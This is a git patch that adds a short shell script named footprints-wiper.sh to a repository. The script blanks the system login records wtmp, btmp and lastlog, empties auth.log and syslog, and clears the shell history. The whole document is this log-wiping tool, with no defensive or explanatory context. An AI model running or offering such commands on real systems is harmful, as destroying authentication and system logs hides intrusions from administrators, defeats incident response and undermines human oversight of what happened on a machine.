From de5ecfc9e1fd7a10074bcc85f7e51f64a296b306 Mon Sep 17 00:00:00 2001 From: ditaajipratama Date: Thu, 30 May 2024 20:03:19 +0700 Subject: [PATCH] add footprints-wiper.sh --- shell/footprints-wiper.sh | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 shell/footprints-wiper.sh diff --git a/shell/footprints-wiper.sh b/shell/footprints-wiper.sh new file mode 100644 index 0000000..5682872 --- /dev/null +++ b/shell/footprints-wiper.sh @@ -0,0 +1,7 @@ +echo > /var/log/wtmp +echo > /var/log/btmp +echo > /var/lastlog +echo > /var/log/auth.log +echo > /var/log/syslog + +history -c